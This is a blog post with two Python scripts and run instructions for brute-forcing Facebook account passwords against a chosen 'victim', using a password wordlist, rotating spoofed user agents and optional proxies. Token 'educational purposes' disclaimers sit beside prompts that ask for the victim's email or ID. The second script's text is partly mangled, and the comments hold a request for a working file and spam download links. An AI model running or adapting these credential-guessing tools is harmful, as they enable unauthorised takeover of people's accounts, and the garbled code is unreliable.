الأحد، 17 نوفمبر 2013

Python Script for facebook Brute force Attact

This Script Only works on BackTrack ...
Here are the steps
Just Copy the below code save in the text Editor
Change its Extension to fb.py & save it to Desktop
Now open the terminal and type >
cd Desktop
Hit Enter
Now Type >
python fb.py 
Simply follow the steps 
Note uhh will require Dictionary for this attact go to below links :
 OR Create your Own Dictionary

Here's the Script :

  1. #!usr/bin/python
  2. #Facebook Cracker Version 2 can crack into Facebook Database 100% without Interruption By Facebook Firewall !
  3. #This program is for educational purposes only.
  4. #Don't attack people facebook accounts it's illegal !
  5. #If you want to crack into someone's account, you must have the permission of the user.
  6. #Mauritania Attacker is not responsible.or even me!!
  7. import sys
  8. import random
  9. import mechanize
  10. import cookielib
  11. GHT = '''
  12.         +=======================================+
  13.         |..........Facebook Cracker v 2.........|
  14.         +---------------------------------------+
  15.         |#Author: Mauritania Attacker           |
  16.         |#Contact: www.fb.com/mauritanie.forever|
  17.         |#Date: 02/04/2013                      |
  18.         |#This tool is made for pentesting.     |
  19.         |#Changing the Description of this tool |
  20.         |Won't made you the coder ^_^ !!!       |
  21.         |#Respect Coderz ^_^                    |
  22.         |#I take no responsibilities for the    |
  23.         |  use of this program !                |
  24.         +=======================================+
  25.         |..........Facebook Cracker v 2.........|
  26.         +---------------------------------------+
  27. '''
  28. print "Note: - This tool can crack facebook account even if you don't have the email of your victim"
  29. print "# Hit CTRL+C to quit the program"
  30. print "# Use www.graph.facebook.com for more infos about your victim ^_^"
  31. email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : "))
  32. passwordlist = str(raw_input("Enter the name of the password list file : "))
  33. useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
  34. login = 'http://www.facebridge.net/login.php?login_attempt=1&sc=1'
  35. def attack(password):
  36.   try:
  37.      sys.stdout.write("\r[*] trying %s.. " % password)
  38.      sys.stdout.flush()
  39.      br.addheaders = [('User-agent', random.choice(useragents))]
  40.      site = br.open(login)
  41.      br.select_form(nr=0)
  42.      
  43.      ##Facebook
  44.      br.form['email'] =email
  45.      br.form['pass'] = password
  46.      br.submit()
  47.      log = br.geturl()
  48.      if log != login:
  49.         print "\n\n\n [*] Password found .. !!"
  50.         print "\n [*] Password : %s\n" % (password)
  51.         sys.exit(1)
  52.   except KeyboardInterrupt:
  53.         print "\n[*] Exiting program .. "
  54.         sys.exit(1)
  55. def search():
  56.     global password
  57.     for password in passwords:
  58.         attack(password.replace("\n",""))
  59. def check():
  60.     global br
  61.     global passwords
  62.     try:
  63.        br = mechanize.Browser()
  64.        cj = cookielib.LWPCookieJar()
  65.        br.set_handle_robots(False)
  66.        br.set_handle_equiv(True)
  67.        br.set_handle_referer(True)
  68.        br.set_handle_redirect(True)
  69.        br.set_cookiejar(cj)
  70.        br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  71.     except KeyboardInterrupt:
  72.        print "\n[*] Exiting program ..\n"
  73.        sys.exit(1)
  74.     try:
  75.        list = open(passwordlist, "r")
  76.        passwords = list.readlines()
  77.        k = 0
  78.        while k < len(passwords):
  79.           passwords[k] = passwords[k].strip()
  80.           k += 1
  81.     except IOError:
  82.         print "\n [*] Error: check your password list path \n"
  83.         sys.exit(1)
  84.     except KeyboardInterrupt:
  85.         print "\n [*] Exiting program ..\n"
  86.         sys.exit(1)
  87.     try:
  88.         print GHT
  89.         print " [*] Account to crack : %s" % (email)
  90.         print " [*] Loaded :" , len(passwords), "passwords"
  91.         print " [*] Cracking, please wait ..."
  92.     except KeyboardInterrupt:
  93.         print "\n [*] Exiting program ..\n"
  94.         sys.exit(1)
  95.     try:
  96.         search()
  97.         attack(password)
  98.     except KeyboardInterrupt:
  99.         print "\n [*] Exiting program ..\n"
  100.         sys.exit(1)
  101. if __name__ == '__main__':
  102.     check()



    This could also works :D

    [b]#!/usr/bin/python
    # This is facebook bruteforcer tools
    # This was written for educational purpose and pentest only. Use it at your own risk.
    # Author will not be responsible for any damage !!
    # Toolname  : FaceBrute.py
    # Programmer    : Woah
    # Version   : 1.0


    import re
    import os
    import sys
    import random
    import warnings
    import time
    try:
        import mechanize
    except ImportError:
        print "[*] Please install mechanize python module first"
        sys.exit(1)
    except KeyboardInterrupt:
        print "n[*] Exiting program...n"
        sys.exit(1)
    try:
        import cookielib
    except ImportError:
        print "[*] Please install cookielib python module first"
        sys.exit(1)
    except KeyboardInterrupt:
        print "n[*] Exiting program...n"
        sys.exit(1)

    warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

    # define variable
    __programmer__  = "gunslinger_ "
    __version__     = "1.0"
    verbose     = False
    useproxy    = False
    usepassproxy    = False
    log     = 'fbbruteforcer.log'
    file        = open(log, "a")
    success     = 'http://www.facebook.com/?sk=messages&ref=mb'
    fblogin     = 'https://login.facebook.com/login.php?login_attempt=1'
    # some cheating ..
    ouruseragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
            'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
            'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                'Opera/8.00 (Windows NT 5.1; U; en)',
            'amaya/9.51 libwww/5.4.0',
            'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
            'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
            'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
            'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
            'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
            ]
    facebook    = '''
      __               _                 _
    / _|             | |               | |
    | |_ __ _  ___ ___| |__   ___   ___ | | __
    |  _/ _` |/ __/ _  '_  / _  / _ | |/ /
    | || (_| | (_|  __/ |_) | (_) | (_) |   <
    |_| __,_|______|_.__/ ___/ ___/|_|_\
                        bruteforcer...

    Programmer : %s
    Version    : %s''' % (__programmer__, __version__)
    option          = '''
    Usage  : %s [options]
    Option : -u, --username             |   User for bruteforcing
             -w, --wordlist             |   Wordlist used for bruteforcing
             -v, --verbose              |   Set %s will be verbose
             -p, --proxy           |   Set http proxy will be use
             -k, --usernameproxy        |   Set username at proxy will be use
             -i, --passproxy        |   Set password at proxy will be use
             -l, --log          |   Specify output filename (default : fbbruteforcer.log)
             -h, --help                     |   Print this help

    Example : %s -u brad@hackme.com -w wordlist.txt"

    P.S : add "&" to run in the background
    ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
    hme         = '''
    Usage : %s [option]
        -h or --help for get help
        ''' % sys.argv[0]

    def helpme():
        print facebook
        print option
        file.write(facebook)
        file.write(option)
        sys.exit(1)

    def helpmee():
        print facebook
        print hme
        file.write(facebook)
        file.write(hme)
        sys.exit(1)

    for arg in sys.argv:
        try:
            if arg.lower() == '-u' or arg.lower() == '--user':
                        username = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                        wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-l' or arg.lower() == '--log':
                        log = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-p' or arg.lower() == '--proxy':
                    useproxy = True
                        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                    usepassproxy = True
                        usw = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                    usepassproxy = True
                        usp = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-v' or arg.lower() == '--verbose':
                        verbose = True
                elif arg.lower() == '-h' or arg.lower() == '--help':
                    helpme()
            elif len(sys.argv) <= 1:
                helpmee()
        except IOError:
            helpme()
        except NameError:
            helpme()
        except IndexError:
            helpme()

    def bruteforce(word):
        try:
            sys.stdout.write("r[*] Trying %s...                    " % word)
            file.write("[*] Trying %sn" % word)
            sys.stdout.flush()
            br.addheaders = [('User-agent', random.choice(ouruseragent))]
            opensite = br.open(fblogin)
            br.select_form(nr=0)
            br.form['email'] = username
            br.form['pass'] = word
            br.submit()
            response = br.response().read()
            if verbose:
                print response
            if success in response:
                print "nn[*] Logging in success..."
                print "[*] Username : %s" % (username)
                print "[*] Password : %sn" % (word)
                file.write("n[*] Logging in success...")
                file.write("n[*] Username : %s" % (username))
                file.write("n[*] Password : %snn" % (word))
                sys.exit(1)
        except KeyboardInterrupt:
            print "n[*] Exiting program...n"
            sys.exit(1)
        except mechanize._mechanize.FormNotFoundError:
            print "n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.comn"
            file.write("n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.comn")
            sys.exit(1)
        except mechanize._form.ControlNotFoundError:
            print "n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.comn"
            file.write("n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.comn")
            sys.exit(1)

    def releaser():
        global word
        for word in words:
            bruteforce(word.replace("n",""))

    def main():
        global br
        global words
        try:
            br = mechanize.Browser()
            cj = cookielib.LWPCookieJar()
            br.set_cookiejar(cj)
            br.set_handle_equiv(True)
            br.set_handle_gzip(True)
            br.set_handle_redirect(True)
            br.set_handle_referer(True)
            br.set_handle_robots(False)
            br.set_debug_http(False)
            br.set_debug_redirects(False)
            br.set_debug_redirects(False)
            br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
            if useproxy:
                br.set_proxies({"http": proxy})
            if usepassproxy:
                br.add_proxy_password(usw, usp)
            if verbose:
                br.set_debug_http(True)
                br.set_debug_redirects(True)
                br.set_debug_redirects(True)
        except KeyboardInterrupt:
            print "n[*] Exiting program...n"
            file.write("n[*] Exiting program...n")
            sys.exit(1)
        try:
            preventstrokes = open(wordlist, "r")
            words          = preventstrokes.readlines()
            count          = 0
            while count < len(words):
                words[count] = words[count].strip()
                count += 1
        except IOError:
            print "n[*] Error: Check your wordlist pathn"
            file.write("n[*] Error: Check your wordlist pathn")
            sys.exit(1)
        except NameError:
            helpme()
        except KeyboardInterrupt:
            print "n[*] Exiting program...n"
            file.write("n[*] Exiting program...n")
            sys.exit(1)
        try:
            print facebook
            print "n[*] Starting attack at %s" % time.strftime("%X")
            print "[*] Account for bruteforcing %s" % (username)
            print "[*] Loaded :",len(words),"words"
            print "[*] Bruteforcing, please wait..."
            file.write(facebook)
            file.write("n[*] Starting attack at %s" % time.strftime("%X"))
            file.write("n[*] Account for bruteforcing %s" % (username))
            file.write("n[*] Loaded : %d words" % int(len(words)))
            file.write("n[*] Bruteforcing, please wait...n")
        except KeyboardInterrupt:
            print "n[*] Exiting program...n"
            sys.exit(1)
        try:
            releaser()
            bruteforce(word)
        except NameError:
            helpme()

    if __name__ == '__main__':
        main()[/b]

هناك تعليقان (2):

  1. there are some problem in this file, please send me correct file,please..

    ردحذف
  2. Python Script For Facebook Brute Force Attact ~ Hb Technical Blog >>>>> Download Now

    >>>>> Download Full

    Python Script For Facebook Brute Force Attact ~ Hb Technical Blog >>>>> Download LINK

    >>>>> Download Now

    Python Script For Facebook Brute Force Attact ~ Hb Technical Blog >>>>> Download Full

    >>>>> Download LINK

    ردحذف